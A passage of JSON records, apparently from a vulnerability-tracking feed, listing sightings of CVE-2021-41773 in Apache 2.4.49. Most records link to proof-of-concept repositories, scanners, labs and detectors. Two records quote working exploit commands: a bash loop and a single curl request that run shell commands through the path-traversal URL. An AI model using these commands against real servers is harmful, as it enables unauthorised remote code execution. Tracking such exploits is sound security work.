"2021-10-06T13:45:03.000000Z"}, {"uuid": "420e7fe0-c5cd-473e-9207-60cda5d358d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/674", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Grabber\nURL\uff1ahttps://github.com/apapedulimu/Apachuk", "creation_timestamp": "2021-10-11T01:00:28.000000Z"}, {"uuid": "b6ccfa77-60ae-4369-bb61-a4af8fe27f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/650", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.\nURL\uff1ahttps://github.com/RyouYoo/CVE-2021-41773", "creation_timestamp": "2021-10-05T20:33:43.000000Z"}, {"uuid": "eac868cc-d654-4d1c-882d-08381456d005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/649", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPath traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) \nURL\uff1ahttps://github.com/knqyf263/CVE-2021-41773", "creation_timestamp": "2021-10-05T16:55:20.000000Z"}, {"uuid": "66eac895-338e-41ee-b42d-eaa891ab3d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/656", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773.nse\nURL\uff1ahttps://github.com/TishcaTpx/cve-2021-41773-nse", "creation_timestamp": "2021-10-06T05:35:54.000000Z"}, {"uuid": "bf9d6488-ae1a-4ebb-8e88-865957c3c494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/648", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773\nURL\uff1ahttps://github.com/numanturle/CVE-2021-41773", "creation_timestamp": "2021-10-05T16:21:03.000000Z"}, {"uuid": "ca5193a2-2abc-4b97-a06c-76899ed5f49b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/647", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.\nURL\uff1ahttps://github.com/Vulnmachines/cve-2021-41773", "creation_timestamp": "2021-10-05T16:16:44.000000Z"}, {"uuid": "18996510-79ed-4346-983f-90d9c987b873", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/655", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773.nse\nURL\uff1ahttps://github.com/creadpag/CVE-2021-41773", "creation_timestamp": "2021-10-06T05:27:23.000000Z"}, {"uuid": "9de214bb-e655-408c-95c9-155ad6406f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/678", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple script realizado en bash, para revisi\u00f3n de m\u00faltiples hosts para CVE-2021-41773 (Apache)\nURL\uff1ahttps://github.com/jheeree/Simple-CVE-2021-41773-checker", "creation_timestamp": "2021-10-12T03:01:17.000000Z"}, {"uuid": "0fca118c-24ac-4a35-b71e-3de9c93994bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/805", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSome docker images to play with CVE-2021-41773 and CVE-2021-42013\nURL\uff1ahttps://github.com/Hydragyrum/CVE-2021-41773-Playground", "creation_timestamp": "2021-11-04T22:56:15.000000Z"}, {"uuid": "6bcf7976-f0f0-4186-a710-734d72e71d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/668", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aexploit to CVE-2021-41773\nURL\uff1ahttps://github.com/n3k00n3/CVE-2021-41773", "creation_timestamp": "2021-10-07T15:19:54.000000Z"}, {"uuid": "21269262-fc3a-4cca-84c3-47d3cba83527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/cKure/7543", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Apache Software Foundation has released HTTP Web Server 2.4.51 to address an actively exploited path traversal vulnerability (CVE-2021-41773) that was only partially addressed with a previous release.\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html", "creation_timestamp": "2021-10-08T15:06:01.000000Z"}, {"uuid": "5ebb314b-9b62-47d9-b114-ca0adaf19229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/712", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).\nURL\uff1ahttps://github.com/vulf/CVE-2021-41773_42013", "creation_timestamp": "2021-10-18T12:53:10.000000Z"}, {"uuid": "99e43c52-52a1-4059-b4b4-1a4af2664a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/737", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)\nURL\uff1ahttps://github.com/corelight/CVE-2021-41773", "creation_timestamp": "2021-10-25T05:17:17.000000Z"}, {"uuid": "22ab1b25-9b7a-4df8-8b39-d656b4a7985d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/886", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Test Page &amp; Exploit Code\nURL\uff1ahttps://github.com/jhye0n/CVE-2021-41773", "creation_timestamp": "2021-11-26T04:59:31.000000Z"}, {"uuid": "d6ad9e6d-93de-46ed-829f-c77c84edcdef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/833", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProof-of-Concept for CVE-2021-41773\nURL\uff1ahttps://github.com/ahmad4fifz/docker-cve-2021-41773", "creation_timestamp": "2021-11-09T05:26:11.000000Z"}, {"uuid": "22cee02e-da52-47fa-9f69-a423cd4d7116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7471", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day exploit code:\n\nhttps://github.com/Vulnmachines/cve-2021-41773", "creation_timestamp": "2021-10-05T17:00:51.000000Z"}, {"uuid": "9306a6f8-5636-4b3e-875e-1984757146cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mizizvmm3i2t", "content": "", "creation_timestamp": "2026-04-09T00:03:42.070890Z"}, {"uuid": "489c4199-2a76-4178-9c2c-88fefdc9c2e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7469", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 PoC (not included) for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)\n\nhttps://twitter.com/ducnt_/status/1445386557574324234", "creation_timestamp": "2021-10-05T14:37:33.000000Z"}, {"uuid": "04540ca9-dc62-4bee-bf3c-94a032d8e3f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7504", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Update : CVE-2021-41773 POC as RCE.\n\ncat file | while read host do ; do curl --silent --path-as-is --data \"echo;id\" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep \"uid\" &amp;&amp; echo \"$host \\033[0;31mVuln\\n\"|| echo \"$host \\033[0;32mNot\\n\";done\n\nSource: Rohit", "creation_timestamp": "2021-10-06T21:35:44.000000Z"}, {"uuid": "124f2b07-630a-4f08-842f-fa4fbd4684c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7503", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Update: CVE-2021-41773 POC as RCE via BurpSuite.\n\nSource: Rapid-SafeGuard", "creation_timestamp": "2021-10-06T21:35:36.000000Z"}, {"uuid": "8625e7aa-9f51-4f21-a537-fbc88b254518", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7480", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 CVE-2021-41773.nse by Dhiraj (\ud83c\uddee\ud83c\uddf3/\ud83c\udde6\ud83c\uddea)\n\nhttps://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse", "creation_timestamp": "2021-10-06T05:47:45.000000Z"}, {"uuid": "f49a6a89-c46e-4511-ae24-1ebf4a4873de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7562", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day: add. apache 2.4.49 CVE-2021-41773 - RCE\n\nApache 2.4.49 CVE-2021-41773 and Apache 2.4.50 CVE-2021-42013 - SCANNER/TRAVERSAL/RCE.\n\nhttps://github.com/rapid7/metasploit-framework/pull/15754", "creation_timestamp": "2021-10-09T20:13:58.000000Z"}, {"uuid": "b4db485f-3727-4660-baad-8bec1efc90a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/cKure/7721", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Apache HTTP Server CVE-2021-42013 and CVE-2021-41773 Exploited in the Wild.\n\nhttps://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-http-server-cve-2021-42013-and-cve-2021-41773-exploited", "creation_timestamp": "2021-10-22T10:18:06.000000Z"}, {"uuid": "ff8b3edc-1976-4f35-bc2f-bc3c0b35d72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7578", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker\n\nAutomatic Mass Tool for checking vulnerability in Apache (Linux) 2.4.49/50\nUsing GNU Parallel. You must have parallel for running this tool\n\nhttps://github.com/im-hanzou/apachrot", "creation_timestamp": "2021-10-12T08:10:40.000000Z"}, {"uuid": "29982bfc-11a8-495c-9eb3-16ab059f9c79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7826", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public.\n\nhttps://github.com/HightechSec/scarce-apache2", "creation_timestamp": "2021-10-29T21:07:05.000000Z"}, {"uuid": "41cf7e3a-8662-414f-804f-50a6a5788bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1402", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPseudopatch for CVE-2021-4034\nURL\uff1ahttps://github.com/m96dg/CVE-2021-41773-exercise", "creation_timestamp": "2022-01-26T11:26:48.000000Z"}, {"uuid": "9b290c7f-1560-478d-a572-b3541e627c39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7479", "content": "\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPath traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) \nURL. Zero-Day \n\nhttps://github.com/knqyf263/CVE-2021-41773", "creation_timestamp": "2021-10-06T05:39:43.000000Z"}, {"uuid": "286c5e5d-56ce-479f-ad78-c37582bcecb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7472", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day exploit code:\n\nhttps://github.com/numanturle/CVE-2021-41773", "creation_timestamp": "2021-10-05T17:00:52.000000Z"}, {"uuid": "73bf9f87-b625-4c0d-b57e-4dd8b7cdad0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4397", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u5229\u7528\n\u63cf\u8ff0\uff1aCVE-2021-41773&amp;CVE-2021-42013\u56fe\u5f62\u5316\u6f0f\u6d1e\u68c0\u6d4b\u5229\u7528\u5de5\u5177\nURL\uff1ahttps://github.com/wangfly-me/Apache_Penetration_Tool\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u5229\u7528", "creation_timestamp": "2023-05-22T16:07:10.000000Z"}, {"uuid": "e3ba8b01-9403-4c83-a20c-502864c8c8a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_http_server_cve_2021_41773", "content": "", "creation_timestamp": "2021-10-05T15:39:32.000000Z"}, {"uuid": "da0a3d57-85fe-4e6a-a4bc-75c123acf166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/8XN8wAMSKexF4HKj61t8L1D_BdecH-IzCKOqVJJvRwF7CEY", "content": "", "creation_timestamp": "2025-08-31T21:00:04.000000Z"}, {"uuid": "7bf2acd4-28ae-441f-bb22-40d96dc7910e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/0biwTUuLeP8fV3CLIKNGVSiiFWt5ZFMF_6OnpLfPRJ6mS18", "content": "", "creation_timestamp": "2025-07-03T03:00:06.000000Z"}, {"uuid": "1da51df5-d3a8-4c58-927b-59170a16f76f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "Telegram/p9aXpoU_FZfvPwaFGC2z6wToIKsj9JEw53i6nfBS-Wl44_8", "content": "", "creation_timestamp": "2025-10-28T21:00:05.000000Z"}, {"uuid": "9abc3638-3615-4fef-8988-04ea2072c61f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/x_notes/366", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u044f\u044f CVE-2021-41773 \u0432 Apache 2.4.49, \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b\u0445\u043e\u0434 \u0438\u0437 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u0447\u0442\u0435\u043d\u0438\u0435\u043c \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u043e\u0434\u0443\u043c\u0430\u043b\u0438 \n\ncurl --data \"A=|echo;id\" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'", "creation_timestamp": "2021-10-06T07:33:35.000000Z"}, {"uuid": "a1c4afd0-bbdd-4b7f-b1e0-7ab2d01461e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "Telegram/4epyOE2WMrg9wtf44lKwHTXzsLVHmzcmItx48ClyVbvn93Q", "content": "", "creation_timestamp": "2025-11-19T21:00:05.000000Z"}, {"uuid": "1d128111-b9f2-435b-9a2b-9375b4654bc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/Z6KDFyAddhR_WTTdj8KLR9BqWCW4LVkYFOJnFavxpUnMZmU", "content": "", "creation_timestamp": "2026-01-08T03:00:07.000000Z"}, {"uuid": "0d8def6c-cce6-4c19-81b9-970ecf292a72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/qjOaAZzY7N8k20cR3teIz-OZWmlhb63IqcEwlIa5eVjooMw", "content": "", "creation_timestamp": "2025-10-07T15:00:06.000000Z"}, {"uuid": "d5d42d40-8d4b-468a-9f9c-6a8ba4e7dd01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/CGx8SegN-49RVeuavtq3Jo8Ts2xr-V3iQ0C2UE4RT_zZzg8", "content": "", "creation_timestamp": "2026-01-12T15:00:08.000000Z"}, {"uuid": "fc8e8ed7-4ce4-45c2-9c71-894f90952ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/BJFlaDl_9BJZma2LgARVypNYw9rydPG4dhbOcWVAV8nGsFg", "content": "", "creation_timestamp": "2026-04-23T09:00:04.000000Z"}, {"uuid": "c94b4585-271b-4d17-a7d2-876730e8d47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/pmzKbihchBYeJvBnkfYLk5LESIxSAVi0zGHv3QahmixU_js", "content": "", "creation_timestamp": "2026-04-20T09:00:05.000000Z"}, {"uuid": "0e972958-6398-4213-b205-cf6edeff5618", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/667", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMASS CVE-2021-41773\nURL\uff1ahttps://github.com/justakazh/mass_cve-2021-41773", "creation_timestamp": "2021-10-07T15:15:37.000000Z"}, {"uuid": "f542580a-9466-4418-8d94-d5175c8b9998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/716", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Docker lab\nURL\uff1ahttps://github.com/cloudbyteelias/CVE-2021-41773", "creation_timestamp": "2021-10-20T01:36:15.000000Z"}, {"uuid": "7003b0d6-a0f8-4f69-ac71-6b699bf2a0a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/742", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49\nURL\uff1ahttps://github.com/walnutsecurity/cve-2021-41773", "creation_timestamp": "2021-10-25T17:33:06.000000Z"}, {"uuid": "5995f068-c2ea-4db2-8a5a-60a80501c0f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/659", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 playground\nURL\uff1ahttps://github.com/blasty/CVE-2021-41773", "creation_timestamp": "2021-10-06T07:22:18.000000Z"}, {"uuid": "0a30cdc6-304b-4509-a52e-11a23dc93782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/879", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 on Docker\nURL\uff1ahttps://github.com/ahmad4fifz/CVE-2021-42013", "creation_timestamp": "2021-11-25T09:55:12.000000Z"}, {"uuid": "0121815b-a969-47fd-80df-584880dc34b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/877", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProof-of-Concept for CVE-2021-41773\nURL\uff1ahttps://github.com/ahmad4fifz/CVE-2021-41773", "creation_timestamp": "2021-11-25T05:21:22.000000Z"}, {"uuid": "421b2bb3-1136-4472-b537-eec3daafda4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/658", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC CVE-2021-41773\nURL\uff1ahttps://github.com/trungnd51/CVE-2021-41773", "creation_timestamp": "2021-10-06T06:39:45.000000Z"}, {"uuid": "95819eb1-3594-42f8-bbb7-d12ca6302185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/657", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773\nURL\uff1ahttps://github.com/creadpag/CVE-2021-41773-POC", "creation_timestamp": "2021-10-06T05:40:10.000000Z"}, {"uuid": 